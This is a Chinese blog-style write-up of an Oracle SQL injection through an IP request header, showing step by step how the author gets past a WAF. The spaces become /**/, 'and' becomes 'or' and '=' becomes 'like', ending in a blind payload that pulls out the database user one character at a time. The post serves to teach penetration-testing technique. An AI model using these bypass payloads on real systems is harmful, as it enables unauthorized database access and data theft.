记录一次Oracle注入绕waf

　　　　这个注入挺特殊的，是ip头注入。我们进行简单的探测:

首先正常发起一次请求，我们发现content-type是76

　　　　

 

 探测注入我习惯性的一个单引号:

一个单引号我发现长度还是76

　　

 

我开始尝试单引号，双引号一起:

我失败了长度还是76

　　

 

一般sql注入输入单引号一般长度都会有些变化。

　　我记录深入探测，我输入'--%20

　　

 

 

返回了200，并且长度是0，这让我产生了一丝好奇。这里很有可能存在注入哦。

　　我继续探测:

　　输入--%20

　　

 

嘶!我不禁开始怀疑这里是不是本身就不存在安全问题呢？

　　我都感觉像是数字类型了，很显然不是。。因为假设是数字类型注入输入'--%20会报错。

　　那么究竟是什么问题呢？我觉得应该是过滤了注释符。过滤了--%20

　　我开始换一种方式进行探测:

　　　　　　我尝试输入'%20and%20'1'='1

　　

 

返回200，长度为空，并且没有报false的提示，我觉得有戏，我尝试输入'%20and%20'1'='2

 

　　

 

输出都一样。。。太坑了吧，这里我猜测可能过滤了and,也有可能过滤了空格

我们先把空格用+代替显示:

输入:'+and+'1'='1

　　

 

返回长度还是76，继续输入:

'+and+'1'='2

 

没任何变化。好了+号测试了不行，我们试试还有啥方法可以代替空格?

输入'/**/and/**/'1'/**/=/**/'1:

 

返回长度76，继续输入:

'/**/and/**/'1'/**/=/**/'2

 

返回长度还是76。。没任何变化。

现在测试了三种方法，那么这里继续推测1.可能过滤了and 2.可能过滤了=号

基于这两种过滤，我开始尝试把and 替换成or，把=替换成/**/

　　再进行输入新的payload:

'/**/or/**/'1'/**/like/**/'1

 

oh!我感觉我有希望了，他终于返回了不一样的结果，接下来继续探测:

输入:'/**/or/**/'1'/**/like/**/'2

 

返回长度76，至此我可以很确认这是个sql注入。

现在我们在理清下思路:

　　1.使用like代替=

　　2.使用/**/代替空格

　　3.使用or代替and

　　然后我们构造如下payload进行探测数据库user:

　　　　'/***/OR/****/1/****/like/****/case/****/when/****/substr(user,1,1)/**/Like/***/'a'/**/then/**/1/****/else/****/exp(1111)/**/end/***/and/**/ '1'='1

　　　　成功遍历出数据库第一位是J:

　　　　

 

然后我们依次往下遍历就是了就能得到完整的user内容。

简单的演示下整个注入的过程。

这次遇到的注入让我知道了，坚持就是胜利!